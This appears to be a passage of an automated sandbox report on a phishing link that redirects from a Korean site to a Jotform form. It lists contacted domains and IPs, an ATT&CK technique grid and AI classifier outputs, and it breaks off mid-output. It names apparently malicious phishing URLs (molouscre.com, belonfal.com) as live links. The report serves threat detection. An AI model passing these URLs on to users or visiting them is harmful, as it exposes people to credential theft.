        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure1
        Drive-by Compromise
        Windows Management Instrumentation1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        3
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Obfuscated Files or Information
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        lantern.roeyecdn.com
        13.224.189.68
        truefalse
          unknown
          alb-ireland-ext-ingress-group-474278744.eu-west-1.elb.amazonaws.com
          52.210.189.118
          truefalse
            unknown
            cdn.w55c.net
            18.184.93.67
            truefalse
              unknown
              stats.g.doubleclick.net
              142.251.173.157
              truefalse
                unknown
                go.lb.jotform.com
                35.201.118.58
                truefalse
                  unknown
                  cdnjs.cloudflare.com
                  104.17.24.14
                  truefalse
                    unknown
                    cm.g.doubleclick.net
                    216.58.206.34
                    truefalse
                      unknown
                      www.google.com
                      142.250.186.36
                      truefalse
                        unknown
                        cdn02.jotfor.ms
                        104.22.73.81
                        truefalse
                          unknown
                          match.adsrvr.org
                          52.223.40.198
                          truefalse
                            unknown
                            star-mini.c10r.facebook.com
                            157.240.252.35
                            truefalse
                              unknown
                              google.com
                              142.250.185.238
                              truefalse
                                unknown
                                web.btncdn.com
                                99.86.4.106
                                truefalse
                                  unknown
                                  pug-lhr-bc.pubmnet.com
                                  185.64.191.210
                                  truefalse
                                    unknown
                                    prod.pinterest.global.map.fastly.net
                                    151.101.128.84
                                    truefalse
                                      unknown
                                      ct.captcha-delivery.com
                                      65.9.66.28
                                      truefalse
                                        unknown
                                        d2lhhyweudwf3e.cloudfront.net
                                        13.32.99.89
                                        truefalse
                                          unknown
                                          googleads.g.doubleclick.net
                                          172.217.16.194
                                          truefalse
                                            unknown
                                            dualstack.pinterest.map.fastly.net
                                            151.101.64.84
                                            truefalse
                                              unknown
                                              submit.jotform.com
                                              104.19.128.105
                                              truefalse
                                                unknown
                                                challenges.cloudflare.com
                                                104.18.94.41
                                                truefalse
                                                  unknown
                                                  etsy.map.fastly.net
                                                  151.101.193.224
                                                  truefalse
                                                    unknown
                                                    td.doubleclick.net
                                                    142.250.184.194
                                                    truefalse
                                                      unknown
                                                      trkn.us
                                                      184.50.112.129
                                                      truefalse
                                                        unknown
                                                        criamaker.com
                                                        108.179.193.188
                                                        truefalse
                                                          unknown
                                                          cdn01.jotfor.ms
                                                          104.22.72.81
                                                          truefalse
                                                            unknown
                                                            dart.l.doubleclick.net
                                                            142.250.185.102
                                                            truefalse
                                                              unknown
                                                              cdn.jotfor.ms
                                                              172.67.7.107
                                                              truefalse
                                                                unknown
                                                                user-data-eu.bidswitch.net
                                                                35.214.136.108
                                                                truefalse
                                                                  unknown
                                                                  adservice.google.com
                                                                  142.250.186.98
                                                                  truefalse
                                                                    unknown
                                                                    dg2iu7dxxehbo.cloudfront.net
                                                                    18.172.103.101
                                                                    truefalse
                                                                      unknown
                                                                      insight.adsrvr.org
                                                                      35.71.131.137
                                                                      truefalse
                                                                        unknown
                                                                        code.jquery.com
                                                                        151.101.2.137
                                                                        truefalse
                                                                          unknown
                                                                          www.childkorea.or.kr
                                                                          121.254.129.67
                                                                          truefalse
                                                                            unknown
                                                                            cdn.pdst.fm
                                                                            35.244.142.80
                                                                            truefalse
                                                                              unknown
                                                                              edge-web.dual-gslb.spotify.com
                                                                              35.186.224.24
                                                                              truefalse
                                                                                unknown
                                                                                d2pbcviywxotf2.cloudfront.net
                                                                                143.204.215.5
                                                                                truefalse
                                                                                  unknown
                                                                                  a.nel.cloudflare.com
                                                                                  35.190.80.1
                                                                                  truefalse
                                                                                    unknown
                                                                                    ax-0001.ax-dc-msedge.net
                                                                                    150.171.30.10
                                                                                    truefalse
                                                                                      unknown
                                                                                      ad.doubleclick.net
                                                                                      142.250.186.70
                                                                                      truefalse
                                                                                        unknown
                                                                                        tag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.com
                                                                                        52.57.232.9
                                                                                        truefalse
                                                                                          unknown
                                                                                          api-eu-central-1.captcha-delivery.com
                                                                                          18.157.207.8
                                                                                          truefalse
                                                                                            unknown
                                                                                            ax-0001.ax-msedge.net
                                                                                            150.171.28.10
                                                                                            truefalse
                                                                                              unknown
                                                                                              pixel.streetmetrics.io
                                                                                              172.67.143.206
                                                                                              truefalse
                                                                                                unknown
                                                                                                hcaptcha.com
                                                                                                104.19.229.21
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  v2nt.molouscre.com
                                                                                                  172.67.135.61
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    lantern.roeye.com
                                                                                                    52.215.105.185
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      dsum-sec.casalemedia.com
                                                                                                      104.18.36.155
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        ummxywds674y02hzzfgqdtufuyrhly9j15bulhfzvjwjvxpsaen9.belonfal.com
                                                                                                        188.114.97.3
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          cdn03.jotfor.ms
                                                                                                          172.67.7.107
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            analytics.google.com
                                                                                                            142.250.185.110
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              ib.anycast.adnxs.com
                                                                                                              185.89.210.180
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                events.jotform.com
                                                                                                                104.19.128.105
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  9910951.fls.doubleclick.net
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    unknown
                                                                                                                    form.jotform.com
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      unknown
                                                                                                                      pixels.spotify.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        unknown
                                                                                                                        tags.w55c.net
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          unknown
                                                                                                                          js.adsrvr.org
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            unknown
                                                                                                                            www.etsy.com
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              unknown
                                                                                                                              pixel.rubiconproject.com
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                unknown
                                                                                                                                resources.xg4ken.com
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  unknown
                                                                                                                                  simage2.pubmatic.com
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    unknown
                                                                                                                                    geo.captcha-delivery.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      unknown
                                                                                                                                      ct.pinterest.com
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        unknown
                                                                                                                                        d.agkn.com
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          unknown
                                                                                                                                          pt.ispot.tv
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            unknown
                                                                                                                                            i.etsystatic.com
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              unknown
                                                                                                                                              x.bidswitch.net
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                unknown
                                                                                                                                                www.facebook.com
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  unknown
                                                                                                                                                  www.dwin1.com
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    unknown
                                                                                                                                                    static.captcha-delivery.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      unknown
                                                                                                                                                      8666735.fls.doubleclick.net
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        unknown
                                                                                                                                                        s.pinimg.com
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          unknown
                                                                                                                                                          analytics.tiktok.com
                                                                                                                                                          unknown
                                                                                                                                                          unknownfalse
                                                                                                                                                            unknown
                                                                                                                                                            ib.adnxs.com
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalse
                                                                                                                                                              unknown
                                                                                                                                                              NameMaliciousAntivirus DetectionReputation
                                                                                                                                                              https://submit.jotform.com/submit/242923371946059false
                                                                                                                                                                unknown
                                                                                                                                                                https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3false
                                                                                                                                                                  unknown
                                                                                                                                                                  https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2Ffalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://v2nt.molouscre.com/wZoRh/false
                                                                                                                                                                      unknown
                                                                                                                                                                      https://submit.jotform.com/server.phpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059false
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=truefalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.etsy.com/false
                                                                                                                                                                              unknown
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              142.250.186.68
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              3.125.247.22
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              104.115.82.9
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                              151.101.0.84
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              142.250.185.102
                                                                                                                                                                              dart.l.doubleclick.netUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              142.250.185.226
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              104.19.128.105
                                                                                                                                                                              submit.jotform.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              151.101.128.84
                                                                                                                                                                              prod.pinterest.global.map.fastly.netUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              142.250.186.70
                                                                                                                                                                              ad.doubleclick.netUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              35.190.80.1
                                                                                                                                                                              a.nel.cloudflare.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              35.71.131.137
                                                                                                                                                                              insight.adsrvr.orgUnited States
                                                                                                                                                                              237MERIT-AS-14USfalse
                                                                                                                                                                              172.217.16.142
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              142.250.186.78
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              1.1.1.1
                                                                                                                                                                              unknownAustralia
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              74.125.133.84
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              2.19.120.73
                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                                              142.250.185.110
                                                                                                                                                                              analytics.google.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              216.58.206.42
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              142.250.185.238
                                                                                                                                                                              google.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              216.58.206.46
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              239.255.255.250
                                                                                                                                                                              unknownReserved
                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                              142.250.185.230
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              65.9.66.87
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              104.22.72.81
                                                                                                                                                                              cdn01.jotfor.msUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              216.58.206.34
                                                                                                                                                                              cm.g.doubleclick.netUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              13.32.99.43
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              2.22.242.33
                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                              64.233.166.84
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              185.89.210.180
                                                                                                                                                                              ib.anycast.adnxs.comGermany
                                                                                                                                                                              29990ASN-APPNEXUSfalse
                                                                                                                                                                              142.250.181.238
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              150.171.30.10
                                                                                                                                                                              ax-0001.ax-dc-msedge.netUnited States
                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                              142.250.185.164
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              143.204.215.109
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              142.250.186.132
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              108.179.193.188
                                                                                                                                                                              criamaker.comUnited States
                                                                                                                                                                              46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                              104.115.82.18
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                              157.240.252.35
                                                                                                                                                                              star-mini.c10r.facebook.comUnited States
                                                                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                                                                              142.250.186.136
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              104.22.73.81
                                                                                                                                                                              cdn02.jotfor.msUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              66.102.1.84
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              104.17.24.14
                                                                                                                                                                              cdnjs.cloudflare.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              52.210.189.118
                                                                                                                                                                              alb-ireland-ext-ingress-group-474278744.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              172.67.7.107
                                                                                                                                                                              cdn.jotfor.msUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              35.186.224.24
                                                                                                                                                                              edge-web.dual-gslb.spotify.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              52.28.245.111
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              143.204.215.5
                                                                                                                                                                              d2pbcviywxotf2.cloudfront.netUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              142.250.185.98
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              2.20.245.138
                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                              151.101.193.224
                                                                                                                                                                              etsy.map.fastly.netUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              99.86.4.106
                                                                                                                                                                              web.btncdn.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              104.19.230.21
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              151.101.66.137
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              142.251.173.157
                                                                                                                                                                              stats.g.doubleclick.netUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              18.157.207.8
                                                                                                                                                                              api-eu-central-1.captcha-delivery.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              142.250.184.196
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              69.173.144.165
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              26667RUBICONPROJECTUSfalse
                                                                                                                                                                              142.250.186.36
                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              142.250.184.198
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              142.250.184.194
                                                                                                                                                                              td.doubleclick.netUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              104.18.36.155
                                                                                                                                                                              dsum-sec.casalemedia.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              172.67.135.61
                                                                                                                                                                              v2nt.molouscre.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              188.114.97.3
                                                                                                                                                                              ummxywds674y02hzzfgqdtufuyrhly9j15bulhfzvjwjvxpsaen9.belonfal.comEuropean Union
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              172.217.18.106
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              157.240.253.35
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                                                                              172.217.16.194
                                                                                                                                                                              googleads.g.doubleclick.netUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              52.223.40.198
                                                                                                                                                                              match.adsrvr.orgUnited States
                                                                                                                                                                              8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                              142.250.185.72
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              104.17.25.14
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              151.101.129.224
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              35.214.136.108
                                                                                                                                                                              user-data-eu.bidswitch.netUnited States
                                                                                                                                                                              19527GOOGLE-2USfalse
                                                                                                                                                                              18.172.103.101
                                                                                                                                                                              dg2iu7dxxehbo.cloudfront.netUnited States
                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                              104.18.94.41
                                                                                                                                                                              challenges.cloudflare.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              151.101.64.84
                                                                                                                                                                              dualstack.pinterest.map.fastly.netUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              185.64.191.210
                                                                                                                                                                              pug-lhr-bc.pubmnet.comUnited Kingdom
                                                                                                                                                                              62713AS-PUBMATICUSfalse
                                                                                                                                                                              121.254.129.67
                                                                                                                                                                              www.childkorea.or.krKorea Republic of
                                                                                                                                                                              3786LGDACOMLGDACOMCorporationKRfalse
                                                                                                                                                                              99.86.4.2
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              52.215.105.185
                                                                                                                                                                              lantern.roeye.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              13.32.99.89
                                                                                                                                                                              d2lhhyweudwf3e.cloudfront.netUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              172.67.143.206
                                                                                                                                                                              pixel.streetmetrics.ioUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              150.171.28.10
                                                                                                                                                                              ax-0001.ax-msedge.netUnited States
                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                              18.184.93.67
                                                                                                                                                                              cdn.w55c.netUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              142.250.186.98
                                                                                                                                                                              adservice.google.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              65.9.66.28
                                                                                                                                                                              ct.captcha-delivery.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              151.101.1.224
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              184.50.112.129
                                                                                                                                                                              trkn.usUnited States
                                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                                              142.250.186.163
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              35.201.118.58
                                                                                                                                                                              go.lb.jotform.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              52.57.232.9
                                                                                                                                                                              tag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              216.58.206.66
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              13.224.189.68
                                                                                                                                                                              lantern.roeyecdn.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              151.101.65.224
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              151.101.2.137
                                                                                                                                                                              code.jquery.comUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              64.233.167.84
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              104.19.229.21
                                                                                                                                                                              hcaptcha.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              142.250.185.131
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              64.233.184.84
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              35.244.142.80
                                                                                                                                                                              cdn.pdst.fmUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              151.101.2.132
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              IP
                                                                                                                                                                              192.168.2.16
                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1538488
                                                                                                                                                                              Start date and time:2024-10-21 12:06:45 +02:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                              Sample URL:https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:15
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              Analysis Mode:stream
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal64.phis.win@50/474@206/791
                                                                                                                                                                              • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.185.131, 172.217.16.142, 64.233.184.84, 34.104.35.123
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                              • VT rate limit hit for: https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059
                                                                                                                                                                              InputOutput
                                                                                                                                                                              URL: https://submit.jotform.com/submit/242923371946059 Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                "trigger_text": "Enter the message as it's shown",
                                                                                                                                                                                "prominent_button_name": "Submit Form",
                                                                                                                                                                                "text_input_field_labels": [
                                                                                                                                                                                  "Type the above text"
                                                                                                                                                                                ],
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://submit.jotform.com/submit/242923371946059 Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": []
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://submit.jotform.com/submit/242923371946059 Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                "trigger_text": "Enter the message as it's shown",
                                                                                                                                                                                "prominent_button_name": "Submit Form",
                                                                                                                                                                                "text_input_field_labels": [
                                                                                                                                                                                  "salt"
                                                                                                                                                                                ],
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": true,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://submit.jotform.com/submit/242923371946059 Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": []
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://v2nt.molouscre.com/wZoRh/ Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": true,
